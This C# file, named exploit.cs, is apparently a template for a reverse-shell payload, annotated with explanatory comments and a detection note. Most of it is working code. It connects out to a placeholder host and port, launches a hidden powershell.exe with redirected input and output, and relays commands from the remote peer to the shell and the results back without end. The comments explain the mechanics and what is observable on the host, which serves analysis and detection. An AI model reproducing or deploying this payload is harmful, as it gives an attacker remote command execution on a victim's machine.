exploit.cs
// using System;
// using System.Diagnostics;
// using System.IO;
// using System.Net;
// using System.Net.Sockets;
// using System.Text;
// Reference: https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc
// Writer over the TCP stream. It is assigned in xml() and read by
// shellOutputDataHandler, which is why it is a static field rather than a local:
// the event handler is static and has no other way to reach the connection.
static System.IO.StreamWriter streamWriter;
/// <summary>
/// Event handler for the child process's redirected standard output: each
/// non-empty output line is written to the static <c>streamWriter</c>, i.e. sent
/// back over the TCP connection opened in xml().
/// </summary>
/// <param name="sendingProcess">Event sender; not used in this handler.</param>
/// <param name="outLine">Event data; <c>outLine.Data</c> holds one line of process output.</param>
public static void shellOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
// A fresh builder per event; it only ever holds the single line being forwarded.
System.Text.StringBuilder strOutput = new System.Text.StringBuilder();
// Null or empty lines are dropped, so blank output lines never reach the peer.
if (!System.String.IsNullOrEmpty(outLine.Data)) {
try {
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
// Flush after every line so output is sent immediately rather than buffered.
streamWriter.Flush();
// Every exception (including write failures on a closed connection) is silently
// discarded; nothing is logged, so a failure here leaves no trace in this code.
} catch (System.Exception) {}
}
}
/// <summary>
/// Reverse-shell payload body: connects out to a TCP endpoint, starts a hidden
/// powershell.exe with redirected standard streams, and relays lines between the
/// socket and the process. Lines read from the socket go to the process's stdin;
/// stdout lines go back through shellOutputDataHandler.
/// </summary>
/// <returns>
/// Declared to return "Success!", but the relay loop below has no exit, so the
/// return statement is never reached.
/// </returns>
// NOTE(review): for detection, the behaviour visible on the host is a process that
// holds an outbound TCP connection and spawns powershell.exe as a child with no
// window and redirected standard handles. Which process hosts this code depends on
// how it is loaded, which this file does not show.
public string xml() {
// "%s" and %d are printf-style placeholders, not valid C# as written; presumably a
// generator outside this file substitutes the remote host and port before the
// code is compiled - confirm against the tool that consumes this template.
System.Net.Sockets.TcpClient tcpClient = new System.Net.Sockets.TcpClient("%s", %d);
System.IO.Stream stream = tcpClient.GetStream();
System.IO.StreamReader streamReader = new System.IO.StreamReader(stream);
// Assigns the static field so the stdout handler can write to the same connection.
streamWriter = new System.IO.StreamWriter(stream);
System.Text.StringBuilder input = new System.Text.StringBuilder();
System.Diagnostics.Process proc = new System.Diagnostics.Process();
proc.StartInfo.FileName = "powershell.exe";
// No console window is created for the child process.
proc.StartInfo.CreateNoWindow = true;
// UseShellExecute must be false for the stream redirection below to be allowed.
proc.StartInfo.UseShellExecute = false;
proc.StartInfo.RedirectStandardOutput = true;
proc.StartInfo.RedirectStandardInput = true;
proc.StartInfo.RedirectStandardError = true;
proc.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(shellOutputDataHandler);
proc.Start();
// Starts asynchronous line-by-line reads of stdout; each line raises OutputDataReceived.
proc.BeginOutputReadLine();
// Relay loop: one line from the socket is passed to the process's stdin per
// iteration, then the buffer is cleared. There is no break or exit condition.
while (true) {
input.Append(streamReader.ReadLine());
proc.StandardInput.WriteLine(input);
input.Remove(0, input.Length);
}
// Will we ever reach this line LOL
// Unreachable: the loop above never terminates normally. The writer is closed
// twice here; the TcpClient, reader and process are not closed in this method.
streamWriter.Close();
streamWriter.Close();
return "Success!";
}